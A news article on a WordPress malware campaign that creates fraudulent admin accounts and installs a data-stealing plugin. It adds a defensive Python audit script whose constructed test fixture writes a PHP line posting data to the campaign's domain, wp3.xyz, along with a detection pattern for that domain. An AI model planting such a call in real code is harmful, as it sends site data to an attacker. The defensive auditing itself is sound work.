- Security researchers find more than 5,000 websites with a piece of malicious code
- The malware installs a plugin that steals login credentials and sensitive data
- The researchers recommended a number of mitigating measures
Thousands of WordPress websites were observed using malware capable of creating a fraudulent administrator account and exfiltrating sensitive data via malicious plugins.
A new report by security researcher Himanshu Anand of c/side claims that at least 5,000 WordPress websites have been found hosting a malicious script that creates an unauthorized administrator account, using a username and password hardcoded in the script itself.
Once the account is created, the script downloads and runs a malicious WordPress plugin. The plugin, which has not been named, is tasked with exfiltrating sensitive data to a remote server. The exfiltrated data includes administrator credentials and operating statuses, the report adds.
How to defend
The researchers were unable to determine exactly how the malicious code ended up on these websites.
“So far we have not identified a common denominator, and our investigation is still ongoing,” Anand said.
Those interested in double-checking whether their website is safe or not should visit one of these websites, the researcher advised:
To defend against the attacks, c/side recommends blocking the domain https://wp3(.)xyz in firewalls or security tools, checking WordPress administrator accounts for unauthorized users, removing suspicious plugins and validating existing ones, strengthening CSRF protections, and implementing multi-factor authentication (MFA). They also recommend, unsurprisingly, using c/side's own services.
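Two of the checks above, searching installed plugins for the indicator domain and reviewing administrator accounts against an allowlist, as an added Python example; this is not code from c/side or the report, and the plugin directory, plugin names, file contents and user list it builds are constructed for illustration. In a real audit `plugins_dir` would be the site's `wp-content/plugins` and the administrator list would come from WP-CLI (`wp user list --role=administrator --field=user_login`).

```python
"""Audit helpers for the wp3.xyz campaign: find plugin files that reference
the indicator domain, and flag administrator accounts the operator did not
create. The sample site is constructed for demonstration only."""
import os
import re
import tempfile

# The domain c/side recommends blocking; matched with or without the scheme.
INDICATOR = re.compile(rb"wp3\.xyz", re.IGNORECASE)


def scan_plugins(plugins_dir):
    """Return relative paths of plugin files that reference the indicator domain."""
    hits = []
    for root, _dirs, files in os.walk(plugins_dir):
        for name in files:
            path = os.path.join(root, name)
            try:
                with open(path, "rb") as fh:  # bytes: PHP files need not be valid UTF-8
                    if INDICATOR.search(fh.read()):
                        hits.append(os.path.relpath(path, plugins_dir))
            except OSError:
                continue  # unreadable file: skip it rather than abort the audit
    return sorted(hits)


def unexpected_admins(admin_logins, allowlist):
    """admin_logins: usernames holding the administrator role (for example the
    output of `wp user list --role=administrator --field=user_login`).
    Returns the ones not on the allowlist: candidates for the fraudulent account."""
    return sorted(set(admin_logins) - set(allowlist))


def build_sample_site():
    """Constructed sample: one benign plugin, one that posts data to the indicator."""
    base = tempfile.mkdtemp(prefix="wp-plugins-")
    os.makedirs(os.path.join(base, "hello-dolly"))
    os.makedirs(os.path.join(base, "seo-booster"))  # constructed plugin name
    with open(os.path.join(base, "hello-dolly", "hello.php"), "w") as fh:
        fh.write("<?php echo 'Hello, Dolly'; ?>\n")
    with open(os.path.join(base, "seo-booster", "loader.php"), "w") as fh:
        fh.write("<?php wp_remote_post('https://wp3.xyz/collect', array('body' => $d)); ?>\n")
    return base


if __name__ == "__main__":
    site = build_sample_site()
    print("plugins referencing indicator:", scan_plugins(site))
    # Constructed admin list: 'admin' is expected, 'wpupdate' is not.
    print("unexpected administrators:", unexpected_admins(["admin", "wpupdate"], ["admin"]))
```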
Being the most popular website builder in the world, WordPress is constantly targeted by threat actors. However, since the core platform is secure for the most part, attackers focus on third-party plugins and themes, especially free ones, which often lack proper maintenance and support.
As a general rule of thumb, businesses should only use plugins and themes from reputable sources and with a strong supporting community. They should also make sure they remove any plugins they don’t use, and keep the remaining plugins up to date.